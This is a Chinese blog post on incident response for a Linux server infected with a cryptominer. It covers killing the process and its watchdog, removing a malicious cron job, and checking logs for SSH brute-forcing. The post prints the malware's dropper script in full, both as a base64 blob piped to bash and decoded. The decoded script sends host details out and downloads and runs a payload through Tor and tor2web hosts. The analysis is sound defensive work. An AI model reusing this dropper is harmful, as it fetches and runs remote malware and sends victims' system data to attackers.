解决linux中挖矿病毒

最新推荐文章于 2024-04-23 14:51:23 发布
最新推荐文章于 2024-04-23 14:51:23 发布
阅读量7.8k 收藏 24
点赞数 10
分类专栏: linux shell waf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chen_jianjian/article/details/118693433
版权
linux 同时被 3 个专栏收录
44 篇文章 4 订阅
订阅专栏
shell
6 篇文章 0 订阅
订阅专栏
waf
2 篇文章 0 订阅
订阅专栏

服务器服务不响应

有同事反应gitlab无法使用,登录服务器后台,发现有个进程占用CPU很高,进程名异常

 获取病毒绝对路径

[root@localhost ~]# cat /proc/17521/cmdline 
wswfEOH6[root@localhost ~]# ls -l /proc/17521/exe 
lrwxrwxrwx. 1 root root 0 7月  13 10:03 /proc/17521/exe -> /root/b5e9c4b2a988579aa182c39360e629bd (deleted)

这边病毒启动后已删除

查看病毒是否有守护

发现病毒有守护且病毒是通过定时任务启动的,杀掉病毒及其守护进程

[root@localhost ~]# ls -l /proc/2151/exe 
lrwxrwxrwx. 1 root root 0 7月  13 10:10 /proc/2151/exe -> /root/9330c5e316c24db405cffc8e22abdbb3 (deleted)
[root@localhost ~]# kill -9 2151
[root@localhost ~]# kill -9 17521

查看定时任务

[root@localhost ~]# crontab -l
7 * * * * /root/.systemd-private-fcpik5lHQoUS1rX8s9YXtANnS7MeR3Wp.sh > /dev/null 2>&1 &

 删除其定时任务

查看病毒信息

[root@localhost ~]# more /root/.systemd-private-fcpik5lHQoUS1rX8s9YXtANnS7MeR3Wp.sh 
#!/bin/bash
exec &>/dev/null
echo fcpik5lHQoUS1rX8s9YXtANnS7MeR3Wp
echo ZmNwaWs1bEhRb1VTMXJYOHM5WVh0QU5uUzdNZVIzV3AKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91
c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogL
WY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAid2FjcG5uc280b3R0eGx5dmpwMmFkYWllYWl2eHgyc2F4b3ltZWRuaWRwM3
p5Zm9xZmM1anBxYWQiKQoKc29ja3ooKSB7Cm49KGRvaC50aGlzLndlYi5pZCBkb2gucG9zdC1mYWN0dW0udGsgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5
sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcg
cmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b
3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MS
wzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4
gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25l
Cn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwL
mFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YX
drIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR
0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9y
MndlYi5pdApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jL
yQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLX
VuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash

从这shell脚本看其应该有加密,不过看起来是用base64进行加密的,解密出来为: 

exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "wacpnnso4ottxlyvjp2adaieaivxx2saxoymednidp3zyfoqfc5jpqad")

sockz() {
n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}

fexe() {
for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.it
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done

其有使用curl从网上下载病毒并执行,执行后会删除其病毒文件,具体病毒的工作原理这边就不分析了。删除其病毒文件,并查找系统中是否还有其他病毒文件,具体为:

[root@localhost ~]# find / -name "*.systemd-private*"

至此病毒已基本被扫除,这为什么会中病毒呢?大概率是服务器不安全,ssh被暴力破解

确认是否ssh被暴力破解

[root@localhost ~]# find /var/log -name 'secure*' -type f | while read line;do awk '/Failed/{print $(NF-3)}' $line;done | awk '{a[$0]++}END{for (j in a) if(a[j] > 20) print j"="a[j]}' | sort -n -t'=' -k 2
172.18.22.10=472
172.26.4.85=690
172.28.94.41=1028
172.28.180.49=1079
172.29.21.201=1141
172.28.180.21=1252
172.28.9.241=1368
172.29.45.32=1390
172.28.108.218=1490
172.29.45.33=1546
172.28.16.113=1888
192.168.122.1=10938
[root@localhost ~]#

确认是ssh被暴力破解,此时需要修改ssh密码,建议密码长度要够,需要大小写,数字及特殊符号的组合,当然还需要其他加固,这边就不详述了。

几米夜空
关注
  • 10
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
linux挖矿检测脚本
07-25
执行自动检测
这个netools占cpu特别多,kill关掉之后过一会又重新自起了,也试过sudo systemctl stop netools 禁止自启 提示提示failed to execute operat
weixin_60504005的博客
01-22 974
Linux的临时文件夹/tmp
最新发布
m0_61629312的博客
04-23 1038
是一个临时文件夹,用于存储临时文件和临时数据。这个目录通常在系统启动时创建,并在每次重新启动后被清空,因此里面的文件不会永久保存,而是在不再需要时被删除。文件夹是Linux系统用于存放临时文件和临时数据的目录,具有临时性和易清理的特点,适合存放程序运行时产生的临时数据和文件。2024年4月23日,周二下午。在Linux系统
Linux挖矿病毒清理通用思路
dayouzi的博客
04-19 3662
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
记录linux挖矿清除步骤
itoof.com专栏
08-28 822
linux服务器删除 git 导致挖矿程序
Linux服务器挖矿病毒
热门推荐
清风弄影
05-19 1万+
linux服务器挖矿病毒了,其脚步内容如下,按照脚本内容涉及进行清理。其XMRSH需要先用chattr -i /tmp/XMRSH修改属性,否则删除不掉。#!/bin/bash#Welcome like-minded friends to come to exchange.#We are a group of people who have a dream.#              ...
美国服务器Linux系统常见病毒以及解决方案介绍
goufangwang的博客
08-20 445
美国服务器Linux系统会有一些常见的病毒,传播以及攻击入侵的方式各不相同,今天小编就来介绍下部分美国服务器Linux系统常见的病毒以及解决方案。 1)Systemd Miner Systemd Miner会使用3种方式进行在美国服务器Linux系统里传播:YARN漏洞、Linux自动化运维工具以及ssh缓存密钥,该病毒早起版本的文件命名是带有Systemd字符串,而后期版本更换为随机名。 特点: 1、善用暗网代理来进行C&C通信 2、通过bash命令下载执行多个功能模块 3、通过SSH暴力破解、S
检查是否挖矿木马4 linux,一款新型的Linux挖矿木马来袭
weixin_42421284的博客
05-13 716
原标题:一款新型的Linux挖矿木马来袭一、事件背景最近接到客户反馈,发现Linux机器卡顿,CPU使用量超标达90%以上,怀疑被挖矿,深信服EDR安全团队第一时间进行了应急处理,并发现该挖矿木马为一款新型的Linux挖矿木马,并对此样本进行了深入的研究分析。二、样本分析1.对一系列矿池地址进行DNS查询请求,如下:相应的矿池地址列表如下: pool.minexmr.com,xmr-eu1.na...
服务器病毒排查与处理
qq_45669210的博客
01-31 1173
用htop命令发现32个线程被完全占用,但是没有显示相应的进程,怀疑是病毒了。
在ubuntu10.04下搭建tftp服务器的血泪史(完美解决本机测试tftp localhost出现:tansfer:timed out)
陈龙的专栏
02-12 6661
 Ubuntu 10.04 下的tftp服务器搭建  第1步:    安装tftp所需的软件。首先需要安装 tftp(-hpa),tftpd(-hpa),前者是客户端,后者是服务程序, 在终端下输入 sudo apt-get install tftp tftpd,安装tftp和tftpd。 然后还需要安装xinetd,在终端下输入 sudo apt-get install xinetd telnetd,安装好xinetd 第2步:    配置相关服务文件。进入根目录下的etc文
Linux清理挖坑病毒sysupdate, networkservice
逸雅安然
07-08 661
清楚定时任务 crontab -l //显示定时任务 crontab -r //清楚定时任务 首先杀进程,kill -9 {进程号},然后删除文件. ps aux|grep sysupdate pa aux|grep networkservice kill -9 pid //杀死上面两个pid sysupdate、networkservice配置都在/etc/目录下,就是:sysupdate、networkservice 同时还有sysguard、update.sh,由于一般病毒会使用cha.
ntools:只需单击一下鼠标即可访问重要的标记信息,从而加快开发速度
05-01
NTools 只需单击一下鼠标即可访问重要的标记信息,从而加快开发速度。 尝试它就是采用它! 如果要在安装NTools之前对其进行测试,请创建一个书签并将此书签放置在此处: [removed](function(){var script=document.createElement('script');script.src='https://rawgit.com/NerOcrO/ntools/master/ntools.user.js?'+Math.floor(new Date);document.body.appendChild(script);})() 看看您可以在自己喜欢的Drupal上做什么! 安装 火狐浏览器 安装 然后单击地址栏旁边的猴子头,然后单击NTools->编辑 将“ localhost”替换为您要在其上应用NTools的域(例如: ://nerocro.m
Linux防护工具clamav病毒库离线版
12-07
**Linux防护工具ClamAV与...总的来说,ClamAV是Linux环境不可或缺的反病毒工具,离线病毒库的使用则为网络不稳定或有特定安全需求的环境提供了便利。通过正确配置和维护,ClamAV能有效保护系统免受恶意软件的侵害。
linux下的文件感染病毒
12-16
病毒Linux的感染机制一般分为以下几步: 1. **检测目标**:病毒会寻找可执行文件,特别是ELF格式的文件。 2. **注入代码**:病毒将自身代码插入到目标文件的可执行部分,或者替换部分原有代码。 3. **修改头信息...
Linux运行ifconfig出现错误解决方法-综合文档
05-22
Linux运行ifconfig出现错误解决方法[摘要]linux运行ifconfig出现错误:正常情况下,只需要在控制面板上输入sudoapTInstallnet-tools就可以正常ifconfig了。不能sudoapTInstallnet-tools,出现这种问题时,解决...
计算机病毒与防护:Linux启动过程.ppt
06-10
* * * * * * * * 计 算 机 病 毒 护 与 防 目录页 Linux启动过程 Linux启动过程 1.内核引导 当计算机打开电源后,首先是BIOS开机自检,按照BIOS设置的启动设备(通常是硬盘)来启动。 操作系统接管硬件以后,首先...
net_connections 占用内存大的问题
zhaoyangjian724的专栏
06-07 239
内存》》》》》 for ((i=1; i<=100; i++)) do echo $i done Tasks: 209 total, 47 running, 160 sleeping, 0 stopped, 2 zombie Cpu(s): 43.7%us, 54.7%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.4%hi, 1.2%si, 0.0%st Mem: 1918460k total, 1036248k used, 882212k ...
关于Linux系统清理/tmp/文件夹
资源备忘
12-25 2705
我们知道,在Linux系统/tmp文件夹里面的文件会被清空,至于多长时间被清空,如何清空的,可能大家知识的就不多了,所以,今天我们就来剖析一个这两个问题。 在RHEL\CentOS\Fedora\系统(本次实验是在RHEL6进行的) 先来看看tmpwatch这个命令,他的作用就是删除一段时间内不使用的文件(removes files which haven’t been accessed
linux感染挖矿病毒
01-27
根据提供的引用内容,以下是处理Linux感染挖矿病毒解决方案: 1. 首先,使用命令行工具(如`ps`、`top`)查看系统正在运行的进程,找出可能是挖矿病毒的进程。可以使用以下命令: ```shell ps aux | grep miner ``` 或者 ```shell top ``` 2. 找到挖矿病毒进程后,使用`kill`命令终止该进程。可以使用以下命令: ```shell kill <进程ID> ``` 3. 如果上述步骤无法解决问题,可能存在其他类型的挖矿病毒,如pamdicks病毒。此时,可以使用杀毒软件(如VirusTotal)对系统进行全面扫描,以检测和清除潜在的恶意文件。VirusTotal是一个免费的在线扫描服务,可以检测文件、域名、IP地址、URL等是否含有恶意代码或威胁。 请注意,处理挖矿病毒需要小心谨慎,建议在专业人士的指导下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值